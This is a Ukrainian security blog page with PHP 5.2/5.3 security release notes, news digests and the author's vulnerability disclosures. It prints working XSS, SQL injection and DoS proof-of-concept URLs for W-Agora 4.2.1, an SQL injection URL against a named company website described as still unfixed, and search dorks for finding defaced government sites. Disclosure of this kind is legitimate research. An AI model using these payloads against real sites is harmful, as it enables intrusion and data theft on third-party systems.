Websecurity - Веб безпека

Нещодавно, 16.12.2010, вийшов PHP 5.2.16. В якому виправлено декілька уразливостей. Даний реліз направлений на покращення стабільності та безпеки гілки 5.2.x і є останнім релізом даної гілки PHP. Раніше планувалося, що PHP 5.2.15 буде останнью версію даної гілки, але потім була випущена ще версія 5.2.16.

Cеред секюріті покращень та виправлень в PHP 5.2.16:

• Виправлена регресія в реалізації open_basedir, що з’явилася в версії 5.2.15.
• Виправлене вибивання в PDO::pgsql при отриманні даних коли сервер не працює.

По матеріалам http://www.php.net.

30.10.2010

У серпні, 29.08.2010, я знайшов численні уразливості в W-Agora (це система веб публікації, тобто по суті CMS) - Cross-Site Scripting, SQL DB Structure Extraction, SQL Injection та Denial of Service уразливості. Які я виявив на офіційноу сайті w-agora.net. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.12.2010

XSS:

http://site/current/search.php?bn=support_news&search_forum='%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=support&gosearch=1

SQL DB Structure Extraction:

http://site/current/search.php?bn=support_news&search_forum='&site=support&gosearch=1

SQL Injection:

http://site/current/search.php?bn=support_news&search_forum='%20or%20version()%3E'5&site=support&gosearch=1

DoS:

http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=%25
http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=
http://site/current/list.php?site=support&bn=support_news

Уразливі W-Agora 4.2.1 та попередні версії.

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням hackzona.com.ua, віруси знову навчилися видаляти антивіруси.

Компанія “Доктор Веб” повідомила про виявлення нового методу протидії роботі антивірусів. Незважаючи на те, що кілька років тому більшість антивірусних вендорів включили до складу своїх продуктів модулі самозахисту, автори сучасних шкідливих програм як і раніше знаходять способи видалення компонентів антивірусного захисту з системи.

Зазначу, що з таким проявом роботи вірусів мені доводилося неодноразово стикатися.

За повідомленням news.techlabs.by, безпека відкритого ПЗ продовжує засмучувати.

Компанія Coverity, що займається питаннями безпеки відкритого ПЗ, провела аналіз 290 відомих продуктів, включаючи Android, Linux, Apache, Samba і PHP. Міф про високий рівень безпеки open-source у черговий раз розвіяний, 45% виявлених при скануванні помилок виявилися досить серйозними, щоб викликати фатальний збій чи відкрити систему для керування хакерами.

За повідомленням itua.info, корпоративні ПК заражаються через соціальні мережі.

Більшість компаній страждає через те, що їхні співробітники захоплюються відвідуванням соціальних мереж.

До такого висновку прийшли експерти відомої антивірусної компанії Panda Security провівши дослідження підприємств малого і середнього бізнесу в США. Близько 33% співробітників зізналися, що заразили робочі комп’ютери вірусами під час відвідування своїх аккаунтів у соціальних мережах.

У грудні, 10.12.2010, вийшов PHP 5.3.4. В якому виправлено чимало помилок, в тому числі й чимало уразливостей. Даний реліз направлений на покращення стабільності та безпеки гілки 5.3.x.

Cеред секюріті покращень та виправлень в PHP 5.3.4:

• Виправлене вибивання в extract методі zip.
• Шляхи, що містять в собі NULL, зараз вважаються невірними. Тобто в PHP доданий захист від Null byte Injection.
• Виправлене потенційне подвіне звільнення в розширенні imap.
• Виправлений NULL pointer dereference в ZipArchive::getArchiveComment.
• Виправлена потенціна дірка в open_basedir.
• Виправлений MOPS-2010-24, виправлена валідація рядків.
• Виправлена підтримка символьної резолюції якщо ціль є DFS шаром.
• Виправлений баг #52929 (вибивання в filter_var з FILTER_VALIDATE_EMAIL з великим обсягом даних).

По матеріалам http://www.php.net.

23.04.2010

У жовтні, 15.10.2009, я знайшов Information Leakage та Full path disclosure уразливості на секюріті проекті http://ua-hack.com. Про що найближчим часом сповіщу адміністрацію проекту.

Торік я вже писав про взлом сайта ua-hack.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

23.04.2010

Information Leakage i Full path disclosure:

http://ua-hack.com/wp-content/uploads/my-md5.txt

Витік інформації про всі файли на сайті та повні шляхи на сервері до них.

Full path disclosure:

http://ua-hack.com/wp-content/plugins/belavir.php

Дані уразливості вже виправлені.

Про похакані сайти в Інтернеті я вже писав, а зараз розповім про похакані державні сайти.

Наведені статистичні дані базуються на моїй методиці пошуку взломаних сайтів, про яку я розповів в своїй статті Кількість похаканих сайтів в Інтернеті в 2008 році.

Взломи сайтів вцілому в Інтернеті:

intitle:”hacked by” inurl:gov - до 16600 сайтів зараз є похаканими.

Звичайно в даних результатах є також новинні сайти, що пишуть про взломи сайтів, але чимало й безпосередньо похаканих gov-сайтів.

Взломи сайтів в Україні:

intitle:”hacked by” inurl:gov - 4 сайти зараз є похаканими.

Взломи сайтів в Росії:

intitle:”hacked by” inurl:gov - 2 сайти зараз є похаканими. Але обидва не є російськими gov-сайтами.

Взломи сайтів в США:

intitle:”hacked by” site:gov - 3 сайти зараз є похаканими.

Стосовно державних сайтів треба розуміти, що іноді державні сайти розміщуються не в gov-зоні (це має місце в Україні і може бути й в інших країнах). Тому лише даними пошуковими запитами не можна охопити всі gov-сайти даних країн.

Виходячи з наведених кількісних показників взломаних державних сайтів в Україні (4), Росії (0) і США (3) можна зробити висновок, що серед даних країн в Україні найменше слідкують за безпекою державних сайтів. Що добре видно з моїх досліджень Уанета, в яких я регулярно згадую про взломані та інфіковані gov.ua сайти України.

На початку грудня, 09.12.2010, вийшов PHP 5.2.15. В якому виправлено чимало помилок та чимало уразливостей. Даний реліз направлений на покращення стабільності та безпеки гілки 5.2.x і є останнім релізом даної гілки PHP.

Cеред секюріті покращень та виправлень в PHP 5.2.15:

• Виправлений extract(), щоб не переписувати $GLOBALS і $this при використанні EXTR_OVERWRITE.
• Виправлене вибивання в extract методі zip.
• Виправлене потенційне подвіне звільнення в розширенні imap.
• Виправлена потенціна дірка в open_basedir.
• Виправлений NULL pointer dereference в ZipArchive::getArchiveComment.
• Виправлений баг #52929 (вибивання в filter_var з FILTER_VALIDATE_EMAIL з великим обсягом даних).

По матеріалам http://www.php.net.

16.10.2009

У лютому, 14.02.2009, я знайшов SQL Injection уразливість на http://usm.co.ua - сайті компанії Укрспецмонтаж, що займається системами безпеки. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

23.12.2010

SQL Injection:

http://usm.co.ua/index.php?content_id=-1%20or%20version()=5

Дана уразливість досі не виправлена.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.umba.od.ua (хакером Dr.NeT)
• http://bizrating.com.ua (хакерами з 1923TURK-GRUP) - 12.2010, зараз сайт вже виправлений адмінами
• http://www.acvaresurs.com (хакером TeRoRisTe_Mc)
• http://ubic.kiev.ua (хакерами з RKH aka Republic of Kosovo Hackers)
• http://trademaster.com.ua (хакером GHoST61) - 15.12.2010, зараз сайт вже виправлений адмінами

В своїй презентації The Critical Need to Secure the Web in Your Company, Osterman Research розповідає про критичну необхідність захистити Веб в вашій компанії. Про сучасні ризики, що існуєть в Інтернеті, та про захист від них.